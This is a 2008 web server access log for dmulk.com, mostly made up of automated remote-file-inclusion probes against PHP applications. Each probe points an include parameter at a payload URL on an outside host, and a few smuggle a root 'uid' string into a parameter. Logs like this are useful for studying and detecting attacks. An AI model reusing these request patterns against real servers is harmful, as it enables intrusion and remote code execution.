98.136.50.138 - - [26/Oct/2008:09:18:25 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
121.78.225.22 - - [26/Oct/2008:09:18:28 -0700] "GET /logs/access_080115.log/errors.php?error=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:18:28 -0700] "GET /errors.php?error=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:18:28 -0700] "GET /logs/errors.php?error=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.225.22 - - [26/Oct/2008:09:18:28 -0700] "GET /logs/access_080529.log/errors.php?error=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.6.22.187 - - [26/Oct/2008:09:18:31 -0700] "GET /logs/access_080530.log HTTP/1.0" 200 2609231 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:18:31 -0700] "GET /logs/access_080727.log/order.php?wp=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:18:31 -0700] "GET /order.php?wp=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.121.137.51 - - [26/Oct/2008:09:18:57 -0700] "GET /logs/access_080520.log//wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://rubi1.100megsfree8.com/scan-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:19:07 -0700] "GET /logs/access_080928.log//samPHPweb/playing.php//common/db.php?commonpath=http://www2.osrd.go.th/webboard/avatars/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:19:07 -0700] "GET /samPHPweb/playing.php//common/db.php?commonpath=http://www2.osrd.go.th/webboard/avatars/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.162.129 - - [26/Oct/2008:09:19:07 -0700] "GET /logs//samPHPweb/playing.php//common/db.php?commonpath=http://www2.osrd.go.th/webboard/avatars/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.162.129 - - [26/Oct/2008:09:19:08 -0700] "GET /logs/access_080625.log//samPHPweb/playing.php//common/db.php?commonpath=http://www2.osrd.go.th/webboard/avatars/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:19:08 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/005-2.jpg HTTP/1.1" 200 334232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
217.31.58.188 - - [26/Oct/2008:09:19:18 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:19:18 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.158.0.5 - - [26/Oct/2008:09:19:37 -0700] "GET /logs/access_080115.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:19:43 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [26/Oct/2008:09:19:46 -0700] "GET /logs/access_080307.log//claroline/phpbb/page_tail.php?includePath=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [26/Oct/2008:09:19:46 -0700] "GET /claroline/phpbb/page_tail.php?includePath=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [26/Oct/2008:09:19:46 -0700] "GET /logs/access_080307.log//claroline/tracking/userLog.php?rootSys=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [26/Oct/2008:09:19:46 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [26/Oct/2008:09:19:47 -0700] "GET /claroline/tracking/userLog.php?rootSys=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [26/Oct/2008:09:19:47 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:19:48 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.231.178 - - [26/Oct/2008:09:19:54 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
208.69.231.178 - - [26/Oct/2008:09:19:54 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.158.0.5 - - [26/Oct/2008:09:19:57 -0700] "GET /logs/access_080529.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [26/Oct/2008:09:19:59 -0700] "GET /logs/access_080316.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:19:59 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:19:59 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:20:00 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:20:00 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:20:00 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [26/Oct/2008:09:20:00 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:09:20:02 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:09:20:02 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:20:03 -0700] "GET /logs/access_080830.log/errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:20:03 -0700] "GET /errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:20:03 -0700] "GET /logs/errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:20:05 -0700] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.58.114 - - [26/Oct/2008:09:20:14 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.artemisfm.gr/main/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.58.114 - - [26/Oct/2008:09:20:14 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.artemisfm.gr/main/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:20:18 -0700] "GET /logs/access_080830.log/errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:20:18 -0700] "GET /errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:20:18 -0700] "GET /logs/errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:20:19 -0700] "GET /logs/access_080723.log/errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:20:19 -0700] "GET /logs/access_080906.log//ws/get_events.php?includedir=http://timjardim.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:20:20 -0700] "GET /ws/get_events.php?includedir=http://timjardim.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
202.186.124.208 - - [26/Oct/2008:09:20:20 -0700] "GET /logs//ws/get_events.php?includedir=http://timjardim.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:09:20:21 -0700] "GET /logs/access_080906.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:20:21 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:09:20:22 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:20:22 -0700] "GET /logs/access_080906.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:09:20:22 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:09:20:22 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.88.49.25 - - [26/Oct/2008:09:20:29 -0700] "GET /logs/access_080714.log//citywriter/head.php?path=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
81.88.49.25 - - [26/Oct/2008:09:20:29 -0700] "GET /logs/access_080118.log//citywriter/head.php?path=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:20:31 -0700] "GET /logs/access_080723.log/errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
59.126.46.141 - - [26/Oct/2008:09:20:44 -0700] "GET /logs/access_080514.log//language.inc.php?langs_dir=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:20:47 -0700] "GET /logs/access_080715.log/str.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:20:48 -0700] "GET /str.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:09:20:49 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:20:49 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:20:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-062.jpg HTTP/1.1" 200 511364 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:21:05 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.235.90.6 - - [26/Oct/2008:09:21:05 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:21:09 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:21:09 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.231.178 - - [26/Oct/2008:09:21:11 -0700] "GET /logs/access_080906.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
208.69.231.178 - - [26/Oct/2008:09:21:11 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
208.69.231.178 - - [26/Oct/2008:09:21:11 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:21:16 -0700] "GET /logs/access_080906.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:21:16 -0700] "GET /logs/access_081008.log/errors.php?error=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.31.58.188 - - [26/Oct/2008:09:21:17 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:21:17 -0700] "GET /errors.php?error=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.31.58.188 - - [26/Oct/2008:09:21:17 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:21:22 -0700] "GET /logs/access_080213.log/str.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:21:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-244.jpg HTTP/1.1" 200 244888 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:21:30 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:21:30 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.235.90.6 - - [26/Oct/2008:09:21:34 -0700] "GET /logs/access_080906.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.235.90.6 - - [26/Oct/2008:09:21:34 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.235.90.6 - - [26/Oct/2008:09:21:34 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:21:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-028.jpg HTTP/1.1" 200 437234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:21:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-082_1.jpg HTTP/1.1" 200 388438 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:21:45 -0700] "GET /logs/access_080614.log/sub.php?menu=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:21:45 -0700] "GET /logs/access_080830.log/errors.php?error=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:21:45 -0700] "GET /sub.php?menu=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:21:51 -0700] "GET /logs/access_080323.log/sub.php?menu=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:21:52 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-032.jpg HTTP/1.1" 200 457762 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
202.181.105.117 - - [26/Oct/2008:09:21:55 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:21:55 -0700] "GET /skin/zero_vote/error.php?dir=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:21:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-010_4.jpg HTTP/1.1" 200 366355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:22:25 -0700] "GET /logs/str.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:22:26 -0700] "GET /logs/access_081015.log//index2.php?page=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:22:26 -0700] "GET /index2.php?page=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:22:26 -0700] "GET /logs//index2.php?page=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:22:26 -0700] "GET /str.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:09:22:29 -0700] "GET /logs/access_080214.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:22:31 -0700] "GET /logs/str.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:22:31 -0700] "GET /str.php?p=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.55.178 - - [26/Oct/2008:09:22:43 -0700] "GET /logs/access_080413.log//index2.php?page=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:22:50 -0700] "GET /logs/access_080214.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.95.109 - - [26/Oct/2008:09:23:00 -0700] "GET /logs/access_081015.log//index2.php?page=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.95.109 - - [26/Oct/2008:09:23:01 -0700] "GET /index2.php?page=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.95.109 - - [26/Oct/2008:09:23:01 -0700] "GET /logs//index2.php?page=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.50.251.47 - - [26/Oct/2008:09:23:18 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.50.251.47 - - [26/Oct/2008:09:23:18 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.50.251.47 - - [26/Oct/2008:09:23:19 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.50.251.47 - - [26/Oct/2008:09:23:19 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:23:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-220.jpg HTTP/1.1" 200 361856 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:23:22 -0700] "GET /logs/access_080214.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:23:27 -0700] "GET /logs/access_080812.log/sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:23:33 -0700] "GET /sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:23:42 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
